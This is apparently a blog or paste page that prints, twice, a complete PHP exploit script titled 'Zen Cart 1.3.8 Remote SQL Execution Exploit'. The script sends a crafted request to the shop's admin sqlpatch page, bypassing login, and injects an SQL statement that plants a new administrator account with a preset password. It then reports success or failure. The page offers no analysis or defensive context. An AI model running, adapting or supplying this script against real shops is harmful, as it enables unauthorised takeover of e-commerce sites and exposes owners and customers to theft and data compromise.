http://noscan.xp3.biz/zen.txt
#!/usr/bin/php
if($argc < 2)
{
echo "
==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================
root@irvian ~# php zen.php http://target.com
==============================================
";exit(1);
}
function gets($url,$post=null) {
$hajar = curl_init();
curl_setopt($hajar,CURLOPT_URL, $url);
curl_setopt($hajar, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($hajar, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($hajar, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt ($hajar, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($hajar, CURLOPT_TIMEOUT, 0);
if($post != null)
{
curl_setopt ($hajar, CURLOPT_POST, true);
curl_setopt ($hajar, CURLOPT_POSTFIELDS,$post);
}
$result = curl_exec($hajar);
curl_close($hajar);
return $result;
}
$url = $argv[1];
$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";
$req = gets($form,"query_string=$enc");
if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}
#!/usr/bin/php
if($argc < 2)
{
echo "
==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================
root@irvian ~# php zen.php http://target.com
==============================================
";exit(1);
}
function gets($url,$post=null) {
$hajar = curl_init();
curl_setopt($hajar,CURLOPT_URL, $url);
curl_setopt($hajar, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($hajar, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($hajar, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt ($hajar, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($hajar, CURLOPT_TIMEOUT, 0);
if($post != null)
{
curl_setopt ($hajar, CURLOPT_POST, true);
curl_setopt ($hajar, CURLOPT_POSTFIELDS,$post);
}
$result = curl_exec($hajar);
curl_close($hajar);
return $result;
}
$url = $argv[1];
$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";
$req = gets($form,"query_string=$enc");
if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}
No comments:
Write comments